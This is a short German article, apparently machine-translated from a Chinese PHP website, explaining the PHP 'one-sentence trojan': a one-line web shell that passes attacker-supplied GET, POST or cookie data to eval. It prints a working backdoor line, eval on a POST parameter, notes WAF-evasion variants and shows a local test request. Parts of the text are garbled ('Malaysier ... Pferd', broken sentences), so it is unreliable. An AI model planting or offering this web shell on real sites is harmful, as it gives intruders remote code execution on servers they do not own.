Was ist PHP Pony?
php Pony ist in einem Satz auch ein Trojanisches Pferd, das sich auf ein Trojanisches Pferd bezieht, das nur eine Codezeile benötigt und die gleichen Funktionen wie ein Malaysier erreichen kann Pferd. Um die Erkennung von WAF zu umgehen, ist der Ein-Wort-Trojaner in unzähligen Variationen aufgetaucht, aber das Wesentliche bleibt dasselbe: Die Funktion des Trojaners führt den von uns gesendeten Befehl aus.
Wie senden wir Befehle und wie werden die gesendeten Befehle ausgeführt?
Wir können Daten über drei Methoden an eine Website senden: GET, POST und COOKIE. In einem Satz verwendet der Trojaner $_GET[' '], $_POST[' '], $_COOKIE[. ' ' ] Empfangen Sie die von uns übergebenen Daten und übergeben Sie die empfangenen Daten an die Funktion, die den Befehl im Ein-Satz-Trojaner ausführt, und führen Sie dann den Befehl aus.
Die meisten der klassischen Ein-Satz-Trojaner, die Sie sehen, bestehen also nur aus zwei Teilen, einem ist der Funktionsteil, der den Code ausführen kann, und der andere ist der Teil, der Daten empfängt.
Zum Beispiel:
<?php eval(@$_POST['a']); ?>
wobei eval die Funktion ist, die den Befehl ausführt, und $_POST['a'] die empfangenen Daten. Die Eval-Funktion führt die empfangenen Daten als PHP-Code aus. Auf diese Weise können wir die Website mit einem eingefügten Ein-Satz-Trojaner jede von uns übergebene PHP-Anweisung ausführen lassen. Das ist die Macht des Ein-Satz-Trojaners.
Beispiel:
Da der Trojaner die Daten von „a“ in der Post-Anfrage ($_POST['a']) erhält, müssen wir das auch tun Die Post-Methode sendet Daten und weist „a“ den Code zu, den wir ausführen möchten. Wenn wir „post“ im Trojaner durch „get“ ersetzen, müssen wir „a“ mit der GET-Methode senden (wie folgt: http://127.0.0.1/test.php?a=phpinfo(); ). Das werde ich nicht tun Werde es noch einmal demonstrieren.
Weitere PHP-Kenntnisse finden Sie auf der PHP-Chinese-Website!
Das obige ist der detaillierte Inhalt vonWas ist PHP Pony?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!